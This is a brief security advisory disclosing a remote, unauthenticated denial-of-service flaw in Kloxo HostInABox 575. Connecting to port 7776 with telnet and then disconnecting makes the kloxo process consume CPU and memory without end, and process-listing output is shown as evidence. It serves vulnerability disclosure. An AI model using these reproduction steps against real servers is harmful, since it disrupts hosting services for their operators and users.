Kloxo HostInABox 575 - remote CPU and mem usage DoS



DESCRIPTION


Remote, unauthenticated users can cause kloxo to consume all available server memory and CPU cycles by simply connecting to, then disconnecting from port 7776.



IMPACT


Remote, unauthenticated users could cause serious performance degredation of a server running Kloxo.

1. telnet x.x.x.x 7776
2. disconnect
3. observe that the most recent instance of kloxo will endlessly consume memory
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root     25872 98.6 15.7  45164 41348 pts/1    R    14:10   0:05      \_ ../sbin/kloxo.exe master
root     25872  101 29.3  80672 76932 pts/1    R    14:10   0:11      \_ ../sbin/kloxo.exe master
root     25872  100 34.3  93608 89916 pts/1    R    14:10   0:13      \_ ../sbin/kloxo.exe master